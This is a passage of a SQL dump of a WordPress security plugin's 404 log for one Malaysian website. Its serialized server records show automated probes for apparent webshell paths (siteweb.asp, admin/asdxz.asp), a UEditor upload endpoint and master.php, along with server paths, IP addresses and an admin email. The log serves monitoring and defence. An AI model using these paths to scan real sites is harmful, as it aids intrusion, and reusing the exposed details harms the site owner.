http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"219.148.168.27\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"219.148.168.27\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"http://bintara.com.my/siteweb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/siteweb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan3UwZfHioVGWbjloHMbgAAAMY\";s:12:\"REDIRECT_URL\";s:12:\"/siteweb.asp\";s:11:\"REMOTE_ADDR\";s:14:\"175.11.214.146\";s:11:\"REMOTE_PORT\";s:5:\"64995\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"http://bintara.com.my/siteweb.asp\";s:10:\"SCRIPT_URL\";s:12:\"/siteweb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan3UwZfHioVGWbjloHMbgAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419987.6771\";s:12:\"REQUEST_TIME\";s:10:\"1571419987\";}}','notice','2019-10-18 17:33:09','2019-10-18 17:33:08',35341960,37129912,'http://bintara.com.my//siteweb.asp',1,0,'219.148.168.27'),(28334,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"//siteweb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"685\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.242.201.15\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.242.201.15\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"http://bintara.com.my/siteweb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/siteweb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan3XI9Mb4wNxKVbgmYsdAAAAkQ\";s:12:\"REDIRECT_URL\";s:12:\"/siteweb.asp\";s:11:\"REMOTE_ADDR\";s:14:\"175.11.214.146\";s:11:\"REMOTE_PORT\";s:5:\"65204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"http://bintara.com.my/siteweb.asp\";s:10:\"SCRIPT_URL\";s:12:\"/siteweb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan3XI9Mb4wNxKVbgmYsdAAAAkQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419996.7581\";s:12:\"REQUEST_TIME\";s:10:\"1571419996\";}}','notice','2019-10-18 17:33:19','2019-10-18 17:33:17',35266144,37071352,'http://bintara.com.my//siteweb.asp',1,0,'61.242.201.15'),(28335,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//images/inde.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"125.98.153.143\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"125.98.153.143\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/images/inde.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/images/inde.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan3bY9Mb4wNxKVbgmYseAAAAko\";s:12:\"REDIRECT_URL\";s:16:\"/images/inde.asp\";s:11:\"REMOTE_ADDR\";s:14:\"175.11.214.146\";s:11:\"REMOTE_PORT\";s:5:\"49203\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/images/inde.asp\";s:10:\"SCRIPT_URL\";s:16:\"/images/inde.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan3bY9Mb4wNxKVbgmYseAAAAko\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571420013.6196\";s:12:\"REQUEST_TIME\";s:10:\"1571420013\";}}','notice','2019-10-18 17:33:35','2019-10-18 17:33:34',35264408,37071912,'http://bintara.com.my//images/inde.asp',1,0,'125.98.153.143'),(28336,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"//SiteMap.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"820\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"58.195.40.70\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"58.195.40.70\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"http://bintara.com.my/SiteMap.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/SiteMap.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan3do9Mb4wNxKVbgmYsewAAAlI\";s:12:\"REDIRECT_URL\";s:12:\"/SiteMap.asp\";s:11:\"REMOTE_ADDR\";s:14:\"175.11.214.146\";s:11:\"REMOTE_PORT\";s:5:\"49453\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"http://bintara.com.my/SiteMap.asp\";s:10:\"SCRIPT_URL\";s:12:\"/SiteMap.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan3do9Mb4wNxKVbgmYsewAAAlI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571420022.7775\";s:12:\"REQUEST_TIME\";s:10:\"1571420022\";}}','notice','2019-10-18 17:33:44','2019-10-18 17:33:43',35342000,37137328,'http://bintara.com.my//SiteMap.asp',1,0,'58.195.40.70'),(28337,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"//SiteMap.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"685\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"121.51.173.121\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"121.51.173.121\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"http://bintara.com.my/SiteMap.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/SiteMap.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan3fY9Mb4wNxKVbgmYsfgAAAkc\";s:12:\"REDIRECT_URL\";s:12:\"/SiteMap.asp\";s:11:\"REMOTE_ADDR\";s:14:\"175.11.214.146\";s:11:\"REMOTE_PORT\";s:5:\"49699\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"http://bintara.com.my/SiteMap.asp\";s:10:\"SCRIPT_URL\";s:12:\"/SiteMap.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan3fY9Mb4wNxKVbgmYsfgAAAkc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571420029.7463\";s:12:\"REQUEST_TIME\";s:10:\"1571420029\";}}','notice','2019-10-18 17:33:51','2019-10-18 17:33:50',35269696,37083792,'http://bintara.com.my//SiteMap.asp',1,0,'121.51.173.121'),(28338,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/asdxz.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.186.226.30\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.186.226.30\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/asdxz.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/asdxz.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan3x9W6eau1YwLtPYHiMAAAAoU\";s:12:\"REDIRECT_URL\";s:16:\"/admin/asdxz.asp\";s:11:\"REMOTE_ADDR\";s:14:\"175.11.214.146\";s:11:\"REMOTE_PORT\";s:5:\"51662\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/asdxz.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/asdxz.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan3x9W6eau1YwLtPYHiMAAAAoU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571420103.3658\";s:12:\"REQUEST_TIME\";s:10:\"1571420103\";}}','notice','2019-10-18 17:35:06','2019-10-18 17:35:03',35341344,37145048,'http://bintara.com.my//admin/asdxz.asp',1,0,'61.186.226.30'),(28339,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/asdxz.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.194.57.188\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.194.57.188\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/asdxz.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/asdxz.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan30I9Mb4wNxKVbgmYsoQAAAkA\";s:12:\"REDIRECT_URL\";s:16:\"/admin/asdxz.asp\";s:11:\"REMOTE_ADDR\";s:14:\"175.11.214.146\";s:11:\"REMOTE_PORT\";s:5:\"51900\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/asdxz.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/asdxz.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan30I9Mb4wNxKVbgmYsoQAAAkA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571420112.923\";s:12:\"REQUEST_TIME\";s:10:\"1571420112\";}}','notice','2019-10-18 17:35:14','2019-10-18 17:35:13',35265712,37062272,'http://bintara.com.my//admin/asdxz.asp',1,0,'58.194.57.188'),(28340,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/ueditor/net/controller.ashx\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:49:\"http://bintara.com.my/ueditor/net/controller.ashx\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/ueditor/net/controller.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan7No9Mb4wNxKVbgmYu0AAAAlY\";s:12:\"REDIRECT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"58.55.160.186\";s:11:\"REMOTE_PORT\";s:5:\"50981\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/ueditor/net/controller.ashx\";s:10:\"SCRIPT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xan7No9Mb4wNxKVbgmYu0AAAAlY\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571420982.9332\";s:12:\"REQUEST_TIME\";s:10:\"1571420982\";}}','notice','2019-10-18 17:49:44','2019-10-18 17:49:43',34973824,36781216,'https://bintara.com.my/ueditor/net/controller.ashx',1,0,'58.55.160.186'),(28341,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/master.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/master.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/master.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaoHUo9Mb4wNxKVbgmY63QAAAkc\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/master.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/master.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaoHUo9Mb4wNxKVbgmY63QAAAkc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"178.208.83.20\";s:11:\"REMOTE_PORT\";s:5:\"31737\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/master.php\";s:10:\"SCRIPT_URL\";s:11:\"/master.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaoHUo9Mb4wNxKVbgmY63QAAAkc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571424082.9746\";s:12:\"REQUEST_TIME\";s:10:\"1571424082\";}}','notice','2019-10-18 18:41:26','2019-10-18 18:41:23',35391704,37196872,'https://bintara.com.my/master.php',1,0,'178.208.83.20'),(28342,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/master.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 